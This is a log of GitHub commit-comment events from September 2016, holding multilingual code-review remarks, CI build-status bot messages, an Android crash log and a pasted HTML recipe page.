{"id":"4559896517","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19012844,"position":16,"line":37,"path":"issue11/edit.php","commit_id":"71dc46a0bec5a6b5d52708d73cf7b6a2437b6224","created_at":"2016-09-14T05:17:55Z","updated_at":"2016-09-14T05:17:55Z","body":"$_GET['id'] をしてくるところまではあっております。\r\nこの「id」が何故必要だったのかを再度考えてみましょう(機能完成にかなり近いところにいます)。\r\n\r\nhttps://github.com/hdfukuoka1985/phptrainning/issues/15#issuecomment-246754936\r\n\r\n\b> こちら、フォームを使うやり方自体が間違っているのでしょうか？\r\n\r\nフォームを使うやり方はあっております！ゆえにおしいところにいらっしゃいます。\r\n\r\n一旦updateが完成すれば、deleteも同じように作れば良いのですぐに完成するかと思います。"}},"created_at":"2016-09-14T05:17:55Z"}
{"id":"4559901098","type":"CommitCommentEvent","actor":{"login":"gg-soeda"},"repo":{"name":"kikimetal/camp-challenge"},"payload":{"comment":{"id":19012857,"position":82,"line":82,"path":"CampChallenge_PHP/001.プログラミング基礎学習１/kiso_01.php","commit_id":"b3827486656a4d4a13aa990a407b758cb951fc24","created_at":"2016-09-14T05:19:57Z","updated_at":"2016-09-14T05:19:57Z","body":"添田です。\r\n四則演算には問題ありません。が、定数と変数による四則演算にしてください。"}},"created_at":"2016-09-14T05:19:57Z"}
{"id":"4559903073","type":"CommitCommentEvent","actor":{"login":"shurcooL"},"repo":{"name":"gopherjs/gopherjs"},"payload":{"comment":{"id":19012858,"position":null,"line":null,"path":null,"commit_id":"f2fc182abb28925c7aa40502db839c6ebd7f7171","created_at":"2016-09-14T05:20:45Z","updated_at":"2016-09-14T05:20:45Z","body":"@neelance, can you please update your vfsgen so that next time you go generate the `compiler/natives` package, it will be compatible with what I generate too?\r\n\r\nJust run `go get -u github.com/shurcooL/vfsgen/cmd/vfsgendev`."}},"created_at":"2016-09-14T05:20:45Z"}
{"id":"4559903671","type":"CommitCommentEvent","actor":{"login":"Coeur"},"repo":{"name":"ZipArchive/ZipArchive"},"payload":{"comment":{"id":19012859,"position":7,"line":45,"path":"README.md","commit_id":"81c8672414855e2de7265b792674d11940f8df23","created_at":"2016-09-14T05:20:59Z","updated_at":"2016-09-14T05:20:59Z","body":"@jhudsonWA For SSZipArchive as a pod, the code in use as defined by the podspec is the ObjC one, which means version 1.6 is perfectly compatible with any version of Swift."}},"created_at":"2016-09-14T05:20:59Z"}
{"id":"4559905440","type":"CommitCommentEvent","actor":{"login":"derrickbwalya"},"repo":{"name":"derrickbwalya/watsup"},"payload":{"comment":{"id":19012862,"position":null,"line":null,"path":null,"commit_id":"d668755fc06746c5fdaa71ac8ff6f1abd0663f77","created_at":"2016-09-14T05:21:45Z","updated_at":"2016-09-14T05:21:45Z","body":"in order to add a branch"}},"created_at":"2016-09-14T05:21:45Z"}
{"id":"4559905621","type":"CommitCommentEvent","actor":{"login":"dingxu"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19012863,"position":264,"line":264,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-14T05:21:49Z","updated_at":"2016-09-14T05:21:49Z","body":"函数的名字，叫toggleCircle才更合适，isShowCircle需要返回一个布尔值的结果，但你这个方法实质是一种行为"}},"created_at":"2016-09-14T05:21:49Z"}
{"id":"4559906743","type":"CommitCommentEvent","actor":{"login":"anjdreas"},"repo":{"name":"anjdreas/UnitsNet"},"payload":{"comment":{"id":19012866,"position":null,"line":null,"path":null,"commit_id":"68d861cd3f9829c76bc73e04769e66ae87dd43f9","created_at":"2016-09-14T05:22:18Z","updated_at":"2016-09-14T05:22:18Z","body":"TeamCity Units.NET :: Build and Test [Build 159](http://teamcity.chump.work/viewLog.html?buildId=705&buildTypeId=UnitsNet_BuildTest) is now running\n"}},"created_at":"2016-09-14T05:22:18Z"}
{"id":"4559907067","type":"CommitCommentEvent","actor":{"login":"dingxu"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19012867,"position":268,"line":268,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-14T05:22:26Z","updated_at":"2016-09-14T05:22:26Z","body":"分号。。。。。。。。。"}},"created_at":"2016-09-14T05:22:26Z"}
{"id":"4559907781","type":"CommitCommentEvent","actor":{"login":"anjdreas"},"repo":{"name":"anjdreas/UnitsNet"},"payload":{"comment":{"id":19012868,"position":null,"line":null,"path":null,"commit_id":"68d861cd3f9829c76bc73e04769e66ae87dd43f9","created_at":"2016-09-14T05:22:46Z","updated_at":"2016-09-14T05:22:46Z","body":"TeamCity Units.NET :: Build and Test [Build 159](http://teamcity.chump.work/viewLog.html?buildId=705&buildTypeId=UnitsNet_BuildTest) outcome was **SUCCESS**\nSummary: Tests passed: 820 Build time: 0:0:29"}},"created_at":"2016-09-14T05:22:46Z"}
{"id":"4559908329","type":"CommitCommentEvent","actor":{"login":"anjdreas"},"repo":{"name":"anjdreas/UnitsNet"},"payload":{"comment":{"id":19012870,"position":null,"line":null,"path":null,"commit_id":"68d861cd3f9829c76bc73e04769e66ae87dd43f9","created_at":"2016-09-14T05:22:58Z","updated_at":"2016-09-14T05:22:58Z","body":"TeamCity Units.NET :: Publish NuGets [Build 159](http://teamcity.chump.work/viewLog.html?buildId=707&buildTypeId=UnitsNet_Publish) is now running\n"}},"created_at":"2016-09-14T05:22:58Z"}
{"id":"4559908846","type":"CommitCommentEvent","actor":{"login":"anjdreas"},"repo":{"name":"anjdreas/UnitsNet"},"payload":{"comment":{"id":19012871,"position":null,"line":null,"path":null,"commit_id":"68d861cd3f9829c76bc73e04769e66ae87dd43f9","created_at":"2016-09-14T05:23:12Z","updated_at":"2016-09-14T05:23:12Z","body":"TeamCity Units.NET :: Publish NuGets [Build 159](http://teamcity.chump.work/viewLog.html?buildId=707&buildTypeId=UnitsNet_Publish) outcome was **SUCCESS**\nSummary: Running Build time: 0:0:13"}},"created_at":"2016-09-14T05:23:12Z"}
{"id":"4559910234","type":"CommitCommentEvent","actor":{"login":"dingxu"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19012878,"position":280,"line":280,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-14T05:23:44Z","updated_at":"2016-09-14T05:23:44Z","body":"`$(document).on(\"keydown\", this.escPressed);`"}},"created_at":"2016-09-14T05:23:44Z"}
{"id":"4559910905","type":"CommitCommentEvent","actor":{"login":"anjdreas"},"repo":{"name":"anjdreas/UnitsNet"},"payload":{"comment":{"id":19012881,"position":null,"line":null,"path":null,"commit_id":"e945e88c285c1bbe302d7d2aec939782af28cc28","created_at":"2016-09-14T05:24:07Z","updated_at":"2016-09-14T05:24:07Z","body":"TeamCity Units.NET :: Build and Test [Build 160](http://teamcity.chump.work/viewLog.html?buildId=708&buildTypeId=UnitsNet_BuildTest) is now running\n"}},"created_at":"2016-09-14T05:24:07Z"}
{"id":"4559911712","type":"CommitCommentEvent","actor":{"login":"anjdreas"},"repo":{"name":"anjdreas/UnitsNet"},"payload":{"comment":{"id":19012883,"position":null,"line":null,"path":null,"commit_id":"e945e88c285c1bbe302d7d2aec939782af28cc28","created_at":"2016-09-14T05:24:22Z","updated_at":"2016-09-14T05:24:22Z","body":"TeamCity Units.NET :: Build and Test [Build 160](http://teamcity.chump.work/viewLog.html?buildId=708&buildTypeId=UnitsNet_BuildTest) outcome was **SUCCESS**\nSummary: Tests passed: 820 Build time: 0:0:23"}},"created_at":"2016-09-14T05:24:22Z"}
{"id":"4559911718","type":"CommitCommentEvent","actor":{"login":"anjdreas"},"repo":{"name":"anjdreas/UnitsNet"},"payload":{"comment":{"id":19012884,"position":null,"line":null,"path":null,"commit_id":"911433d23ee0f31a5fb09d6759a73a319ff2207b","created_at":"2016-09-14T05:24:22Z","updated_at":"2016-09-14T05:24:22Z","body":"TeamCity Units.NET :: Build and Test [Build 161](http://teamcity.chump.work/viewLog.html?buildId=709&buildTypeId=UnitsNet_BuildTest) is now running\n"}},"created_at":"2016-09-14T05:24:22Z"}
{"id":"4559912888","type":"CommitCommentEvent","actor":{"login":"anjdreas"},"repo":{"name":"anjdreas/UnitsNet"},"payload":{"comment":{"id":19012886,"position":null,"line":null,"path":null,"commit_id":"e945e88c285c1bbe302d7d2aec939782af28cc28","created_at":"2016-09-14T05:24:49Z","updated_at":"2016-09-14T05:24:49Z","body":"TeamCity Units.NET :: Publish NuGets [Build 160](http://teamcity.chump.work/viewLog.html?buildId=711&buildTypeId=UnitsNet_Publish) is now running\n"}},"created_at":"2016-09-14T05:24:49Z"}
{"id":"4559912891","type":"CommitCommentEvent","actor":{"login":"anjdreas"},"repo":{"name":"anjdreas/UnitsNet"},"payload":{"comment":{"id":19012887,"position":null,"line":null,"path":null,"commit_id":"911433d23ee0f31a5fb09d6759a73a319ff2207b","created_at":"2016-09-14T05:24:49Z","updated_at":"2016-09-14T05:24:49Z","body":"TeamCity Units.NET :: Build and Test [Build 161](http://teamcity.chump.work/viewLog.html?buildId=709&buildTypeId=UnitsNet_BuildTest) outcome was **SUCCESS**\nSummary: Tests passed: 820 Build time: 0:0:27"}},"created_at":"2016-09-14T05:24:49Z"}
{"id":"4559913144","type":"CommitCommentEvent","actor":{"login":"cotoroma"},"repo":{"name":"cotoroma/Expedition-platformer"},"payload":{"comment":{"id":19012888,"position":12,"line":21,"path":"Assets/src/CharacterController.cs","commit_id":"f26369f87ffa7d4aafd08dce0b31c0ebb6eca988","created_at":"2016-09-14T05:24:55Z","updated_at":"2016-09-14T05:24:55Z","body":"strAnimHero\r\nнужен ли он?"}},"created_at":"2016-09-14T05:24:55Z"}
{"id":"4559913641","type":"CommitCommentEvent","actor":{"login":"HuangJi"},"repo":{"name":"mhchia/mail_scanner"},"payload":{"comment":{"id":19012890,"position":13,"line":107,"path":"utils/formats.py","commit_id":"0b3d4fe49e012aed93129e29537babaae9ac610c","created_at":"2016-09-14T05:25:09Z","updated_at":"2016-09-14T05:25:09Z","body":"好屌\r\n"}},"created_at":"2016-09-14T05:25:09Z"}
{"id":"4559913708","type":"CommitCommentEvent","actor":{"login":"anjdreas"},"repo":{"name":"anjdreas/UnitsNet"},"payload":{"comment":{"id":19012892,"position":null,"line":null,"path":null,"commit_id":"911433d23ee0f31a5fb09d6759a73a319ff2207b","created_at":"2016-09-14T05:25:10Z","updated_at":"2016-09-14T05:25:10Z","body":"TeamCity Units.NET :: Publish NuGets [Build 161](http://teamcity.chump.work/viewLog.html?buildId=713&buildTypeId=UnitsNet_Publish) is now running\n"}},"created_at":"2016-09-14T05:25:10Z"}
{"id":"4559913709","type":"CommitCommentEvent","actor":{"login":"anjdreas"},"repo":{"name":"anjdreas/UnitsNet"},"payload":{"comment":{"id":19012891,"position":null,"line":null,"path":null,"commit_id":"e945e88c285c1bbe302d7d2aec939782af28cc28","created_at":"2016-09-14T05:25:10Z","updated_at":"2016-09-14T05:25:10Z","body":"TeamCity Units.NET :: Publish NuGets [Build 160](http://teamcity.chump.work/viewLog.html?buildId=711&buildTypeId=UnitsNet_Publish) outcome was **SUCCESS**\nSummary: Running Build time: 0:0:21"}},"created_at":"2016-09-14T05:25:10Z"}
{"id":"4559914527","type":"CommitCommentEvent","actor":{"login":"anjdreas"},"repo":{"name":"anjdreas/UnitsNet"},"payload":{"comment":{"id":19012895,"position":null,"line":null,"path":null,"commit_id":"911433d23ee0f31a5fb09d6759a73a319ff2207b","created_at":"2016-09-14T05:25:29Z","updated_at":"2016-09-14T05:25:29Z","body":"TeamCity Units.NET :: Publish NuGets [Build 161](http://teamcity.chump.work/viewLog.html?buildId=713&buildTypeId=UnitsNet_Publish) outcome was **SUCCESS**\nSummary: Running Build time: 0:0:18"}},"created_at":"2016-09-14T05:25:29Z"}
{"id":"4559915139","type":"CommitCommentEvent","actor":{"login":"gabrielneaga"},"repo":{"name":"gabrielneaga/read"},"payload":{"comment":{"id":19012896,"position":null,"line":null,"path":null,"commit_id":"5dc9b503af95a36fcbe321c87129d59cf7a39665","created_at":"2016-09-14T05:25:44Z","updated_at":"2016-09-14T05:25:44Z","body":"Hello"}},"created_at":"2016-09-14T05:25:44Z"}
{"id":"4559917346","type":"CommitCommentEvent","actor":{"login":"cotoroma"},"repo":{"name":"cotoroma/Expedition-platformer"},"payload":{"comment":{"id":19012898,"position":39,"line":39,"path":"Assets/src/CharacterController.cs","commit_id":"f26369f87ffa7d4aafd08dce0b31c0ebb6eca988","created_at":"2016-09-14T05:26:36Z","updated_at":"2016-09-14T05:26:36Z","body":"isFacingDirection()"}},"created_at":"2016-09-14T05:26:36Z"}
{"id":"4559917748","type":"CommitCommentEvent","actor":{"login":"peterhgao"},"repo":{"name":"tjfrahme/sfdat26-frahme"},"payload":{"comment":{"id":19012899,"position":null,"line":null,"path":null,"commit_id":"bb7251dfe0718a4241020dce5b9cab85a83c8b76","created_at":"2016-09-14T05:26:46Z","updated_at":"2016-09-14T05:26:46Z","body":"**HW 1 Feedback**\r\n\r\n**More tasty**\r\n- Nice work doing EDA to get better understanding of the data\r\n- You can also use parse_dates=['date'] in order to parse that column into a date. (as alternative to the lambda and indexing to get the month)\r\n- Nice job, using a original datasets (violations & inspections) to answer the questions. However, if you wanted, you could have also created a master dataframe by creating index columns for inspections and violations, using left joins, and using nunique (count distinct) on inspections and violations index values.\r\n\r\n**A Little More Morbid**\r\n- Nice job, everything looks good\r\n\r\n**Less Morbid**\r\n#8 - we would've like to see you use (by=majors['Major_category'], sharex = True, sharey = True) for your histogram"}},"created_at":"2016-09-14T05:26:46Z"}
{"id":"4559919316","type":"CommitCommentEvent","actor":{"login":"dingxu"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19012900,"position":320,"line":320,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-14T05:27:24Z","updated_at":"2016-09-14T05:27:24Z","body":"上面这三个回调函数，只有prop(\"checked\")是需要事件传递给他们的东西，后面的诸如_this.handWork.otherLine这些东西明显是写死的要获取的东西，应该在各自函数内部去获取，不应该在这里去传递，没意义."}},"created_at":"2016-09-14T05:27:24Z"}
{"id":"4559920575","type":"CommitCommentEvent","actor":{"login":"gg-soeda"},"repo":{"name":"kikimetal/camp-challenge"},"payload":{"comment":{"id":19012907,"position":262,"line":262,"path":"CampChallenge_PHP/002.プログラミング基礎学習２/kiso_02.php","commit_id":"b3827486656a4d4a13aa990a407b758cb951fc24","created_at":"2016-09-14T05:27:57Z","updated_at":"2016-09-14T05:27:57Z","body":"添田です。\r\nひっかけの様で申し訳ないのですが、この課題の条件は「100より小さくなったら」なので、100は許容なんです。\r\nなので、>=ではなく>によるチェックが正しいです。"}},"created_at":"2016-09-14T05:27:57Z"}
{"id":"4559921860","type":"CommitCommentEvent","actor":{"login":"sergeyklay"},"repo":{"name":"Yakovlev-Melarn/directantic"},"payload":{"comment":{"id":19012909,"position":5,"line":5,"path":"directantic/app/components/Breadcrumbs.php","commit_id":"74898b57b3a3579823f80b00ec01495041aa363c","created_at":"2016-09-14T05:28:29Z","updated_at":"2016-09-14T05:28:29Z","body":"https://github.com/phalcongelist/breadcrumbs"}},"created_at":"2016-09-14T05:28:29Z"}
{"id":"4559922110","type":"CommitCommentEvent","actor":{"login":"sergeyklay"},"repo":{"name":"Yakovlev-Melarn/directantic"},"payload":{"comment":{"id":19012910,"position":9,"line":12,"path":"directantic/app/controllers/ControllerBase.php","commit_id":"74898b57b3a3579823f80b00ec01495041aa363c","created_at":"2016-09-14T05:28:36Z","updated_at":"2016-09-14T05:28:36Z","body":"https://github.com/phalcongelist/breadcrumbs"}},"created_at":"2016-09-14T05:28:36Z"}
{"id":"4559922639","type":"CommitCommentEvent","actor":{"login":"sarspatula"},"repo":{"name":"sarspatula/DIVIS"},"payload":{"comment":{"id":19012911,"position":null,"line":null,"path":null,"commit_id":"eeebd0d86ee9ed12f621084ca09d6169d3e4a58e","created_at":"2016-09-14T05:28:47Z","updated_at":"2016-09-14T05:28:47Z","body":"Fail Case: DIVIS 1.0.2.1 crashes when changing input values on the calibration screen. \r\n\r\n09-13 22:25:32.585 13380-13380/com.example.m.divis E/DIVISFragmentData: LifeCycle onPause\r\n09-13 22:25:32.605 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - hasWindowFocus: false\r\n09-13 22:25:32.605 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - isOverflowMenuShowing: false\r\n09-13 22:25:32.605 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - call hideControllers\r\n09-13 22:25:32.605 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - hasWindowFocus: false\r\n09-13 22:25:32.605 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - isOverflowMenuShowing: false\r\n09-13 22:25:32.605 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - call hideControllers\r\n09-13 22:25:32.605 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - hasWindowFocus: false\r\n09-13 22:25:32.605 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - isOverflowMenuShowing: false\r\n09-13 22:25:32.605 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - call hideControllers\r\n09-13 22:25:32.605 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - hasWindowFocus: false\r\n09-13 22:25:32.605 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - isOverflowMenuShowing: false\r\n09-13 22:25:32.605 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - call hideControllers\r\n09-13 22:25:32.605 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - hasWindowFocus: false\r\n09-13 22:25:32.605 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - isOverflowMenuShowing: false\r\n09-13 22:25:32.605 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - call hideControllers\r\n09-13 22:25:32.605 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - hasWindowFocus: false\r\n09-13 22:25:32.605 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - isOverflowMenuShowing: false\r\n09-13 22:25:32.605 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - call hideControllers\r\n09-13 22:25:32.615 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - hasWindowFocus: false\r\n09-13 22:25:32.615 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - isOverflowMenuShowing: false\r\n09-13 22:25:32.615 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - call hideControllers\r\n09-13 22:25:32.615 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - hasWindowFocus: false\r\n09-13 22:25:32.615 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - isOverflowMenuShowing: false\r\n09-13 22:25:32.615 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - call hideControllers\r\n09-13 22:25:32.615 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - hasWindowFocus: false\r\n09-13 22:25:32.615 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - isOverflowMenuShowing: false\r\n09-13 22:25:32.615 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - call hideControllers\r\n09-13 22:25:32.615 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - hasWindowFocus: false\r\n09-13 22:25:32.615 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - isOverflowMenuShowing: false\r\n09-13 22:25:32.615 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - call hideControllers\r\n09-13 22:25:32.615 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - hasWindowFocus: false\r\n09-13 22:25:32.615 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - isOverflowMenuShowing: false\r\n09-13 22:25:32.615 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - call hideControllers\r\n09-13 22:25:32.615 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - hasWindowFocus: false\r\n09-13 22:25:32.615 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - isOverflowMenuShowing: false\r\n09-13 22:25:32.615 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - call hideControllers\r\n09-13 22:25:32.615 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - hasWindowFocus: false\r\n09-13 22:25:32.615 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - isOverflowMenuShowing: false\r\n09-13 22:25:32.615 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - call hideControllers\r\n09-13 22:25:32.615 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - hasWindowFocus: false\r\n09-13 22:25:32.615 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - isOverflowMenuShowing: false\r\n09-13 22:25:32.615 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - call hideControllers\r\n09-13 22:25:32.615 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - hasWindowFocus: false\r\n09-13 22:25:32.615 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - isOverflowMenuShowing: false\r\n09-13 22:25:32.615 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - call hideControllers\r\n09-13 22:25:32.615 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - hasWindowFocus: false\r\n09-13 22:25:32.615 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - isOverflowMenuShowing: false\r\n09-13 22:25:32.615 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - call hideControllers\r\n09-13 22:25:32.615 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - hasWindowFocus: false\r\n09-13 22:25:32.615 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - isOverflowMenuShowing: false\r\n09-13 22:25:32.615 13380-13380/com.example.m.divis D/Editor: onWindowFocusChanged - call hideControllers\r\n09-13 22:25:32.725 13380-13380/com.example.m.divis W/IInputConnectionWrapper: showStatusIcon on inactive InputConnection\r\n"}},"created_at":"2016-09-14T05:28:47Z"}
{"id":"4559923451","type":"CommitCommentEvent","actor":{"login":"sixtygao"},"repo":{"name":"sixtygao/learngit"},"payload":{"comment":{"id":19012915,"position":4,"line":4,"path":"test.txt","commit_id":"b1405ad24faf78a8b84bcde94c6077a0344bbb84","created_at":"2016-09-14T05:29:08Z","updated_at":"2016-09-14T05:29:08Z","body":"github"}},"created_at":"2016-09-14T05:29:08Z"}
{"id":"4559925834","type":"CommitCommentEvent","actor":{"login":"ashmna"},"repo":{"name":"Artak87/fan-football-training-tool"},"payload":{"comment":{"id":19012921,"position":5,"line":19,"path":"src/main/java/org/proffart/football/training/api/impl/PlayerApiImpl.java","commit_id":"9ea65e6e1daa85ff29d93a5923f15ba0e6a9a557","created_at":"2016-09-14T05:30:11Z","updated_at":"2016-09-14T05:30:11Z","body":"**birthday** is not String \r\n**height** is not String\r\n**weight** is not String\r\n**startedTrainings** is not String\r\n**previousExperience** is note String\r\n\r\n**name** must be replaced into **fullName**\r\n\r\nsee Player Entity for correct types"}},"created_at":"2016-09-14T05:30:11Z"}
{"id":"4559928431","type":"CommitCommentEvent","actor":{"login":"abhishek70"},"repo":{"name":"abhishek70/Share-Rides-Android-App"},"payload":{"comment":{"id":19012927,"position":null,"line":null,"path":null,"commit_id":"94c3bfebae5908ef1374ce6d689a966d9f4361bc","created_at":"2016-09-14T05:31:11Z","updated_at":"2016-09-14T05:31:11Z","body":"Hi,\r\nI am really sorry regarding it. As I have install parse server on heroku and I am using it for other apps also that's why I cannot share the file but I can send you the config template file and steps to install parse server on heroku and connect to your app. Its very easy and it will just take less than a hour to set up.\r\n\r\nLet me know if you need the above info.\r\n\r\nThanks\r\n"}},"created_at":"2016-09-14T05:31:11Z"}
{"id":"4559929513","type":"CommitCommentEvent","actor":{"login":"morteza-binary"},"repo":{"name":"binary-com/mobile"},"payload":{"comment":{"id":19012931,"position":13,"line":111,"path":"www/js/pages/new-real-account-opening/components/new-account-maltainvest/new-account-maltainvest.controller.js","commit_id":"6d955cb0e8a36f292f2f58cf170097e028aa35c7","created_at":"2016-09-14T05:31:38Z","updated_at":"2016-09-14T05:31:38Z","body":"Why do you use $rootScope? Our directives should have isolate scope. if you need a data from parent, you should pass them to directive of bind to it."}},"created_at":"2016-09-14T05:31:38Z"}
{"id":"4559931523","type":"CommitCommentEvent","actor":{"login":"Hehouhua"},"repo":{"name":"Hehouhua/ucas_enroll"},"payload":{"comment":{"id":19012936,"position":4,"line":4,"path":"LICENSE","commit_id":"60ee3b26b2acd6934b4ddead6413d1d019c6763c","created_at":"2016-09-14T05:32:26Z","updated_at":"2016-09-14T05:32:26Z","body":"cc"}},"created_at":"2016-09-14T05:32:26Z"}
{"id":"4559932960","type":"CommitCommentEvent","actor":{"login":"prathamesh-sonpatki"},"repo":{"name":"rails/rails"},"payload":{"comment":{"id":19012939,"position":null,"line":null,"path":null,"commit_id":"fbd1e98cf983572ca9884f17f933ffe92833632a","created_at":"2016-09-14T05:32:58Z","updated_at":"2016-09-14T05:32:58Z","body":"Awesome :bow:"}},"created_at":"2016-09-14T05:32:58Z"}
{"id":"4559933258","type":"CommitCommentEvent","actor":{"login":"littleforeastli"},"repo":{"name":"littleforeastli/JRXReport"},"payload":{"comment":{"id":19012940,"position":null,"line":null,"path":null,"commit_id":"878024bf24cffe01cc80f9f069a640365c3349e9","created_at":"2016-09-14T05:33:09Z","updated_at":"2016-09-14T05:33:09Z","body":"ok"}},"created_at":"2016-09-14T05:33:09Z"}
{"id":"4559933512","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19012941,"position":null,"line":null,"path":null,"commit_id":"c8d70a2a6cfdf4dc075c7fd42c6e59770a7c92d7","created_at":"2016-09-14T05:33:14Z","updated_at":"2016-09-14T05:33:14Z","body":"empd_bugfix (nmerket) - i386-Windows-7-VisualStudio-12: OK (2333 of 2334 tests passed, 1 test warnings)\n\n * 2 tests had: EIO diffs.\n * 1 test had: ESO small diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ small diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c8d70a2a6cfdf4dc075c7fd42c6e59770a7c92d7-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c8d70a2a6cfdf4dc075c7fd42c6e59770a7c92d7-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-14T05:33:14Z"}
{"id":"4559935023","type":"CommitCommentEvent","actor":{"login":"redmond1234"},"repo":{"name":"redmond1234/tomatohomepage"},"payload":{"comment":{"id":19012944,"position":null,"line":null,"path":null,"commit_id":"7096e0555c88e75864e96291cb7db04ad2d7989f","created_at":"2016-09-14T05:33:51Z","updated_at":"2016-09-14T05:33:51Z","body":"<!doctype html>\r\n<html lang=\"en\">\r\n<head>\r\n<meta charset=\"utf-8\">\r\n<title>Home</title>\r\n</head>\r\n\r\n<body>\r\n<header>\r\n\t<h1>Tomato Toma-toe</h1>\r\n\t<nav>\r\n\t<ul>\r\n\t   <li><a href=\"index.html\">Home</a></li>\r\n\t   <li><a href=\"recipes.html\">Recipes</a></li>\r\n\t   <li><a href=\"tomatolovers.html\">Tomato Lovers Corner</a></li>\r\n\t   <li><a href=\"resources.html\">Resources</a></li>\r\n\t   <li><a href=\"aboutus.html\">About Us</a></li>\r\n\t</ul>\r\n\t</nav>\r\n</header>\r\n\r\n<cite>All Tomato</cite><blockquote><q>Absolutely nothing tastes better than a warm, home grown, vine-rigppened tomato on fresh-baked bread!</q></blockquote>\r\n<p><mark>California makes the best dip.</mark> Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book</p>\r\n</section>\r\n\r\n<main>\r\n<article>\r\n<section itemscope itemtype=\"http://schema.org/Recipe\">Recipes>\r\n<h2</h2>\r\n<figure>\r\n<img src=\"../images/gazpachodip.jpe\" alt=\"Gazpacho Dip\" itemprop=\"image\">\r\n</figure>\r\n<figcaption>The most delicious Gazpacho Dip in the world.</figcaption>\r\n<h4 itemprop=\"name\">GAZPACHO DIP</h4>\r\n\r\n<p>Prep Time: <time datetime=\"PT5M\" itemprop=\"prepTime\">10 min</time> plus refrigerating</p>\r\n</section>\r\n\r\n\t<ul>\r\n\t\t<li itemprop=\"ingredients\">1 tomato, chopped</li>\r\n\t\t<li itemprop=\"ingredients\">1/2 cup chopped cucumber</li>\r\n\t\t<li itemprop=\"ingredients\">1/2 cup chopped yellow peppers</li>\r\n\t\t<li itemprop=\"ingredients\">1/4 cup chopped red onions</li>\r\n\t\t<li itemprop=\"ingredients\">1/4 cup light Italian dressing</li>\r\n\t\t<li itemprop=\"ingredients\">1/8 tsp. ground black pepper</li>\r\n\t\t<li itemprop=\"ingredients\">RED OVAL FARMS MINI STONED WHEAT THINS Snack Crackers</li>\r\n\t</ul>\r\nhttps://schema.org/NutritionInformation\">\t\r\n\t<h4>Make It!</h4>\r\n\t<p>COMBINE all ingredients except crackers.</p>\r\n\t<p>REFRIGERATE 30 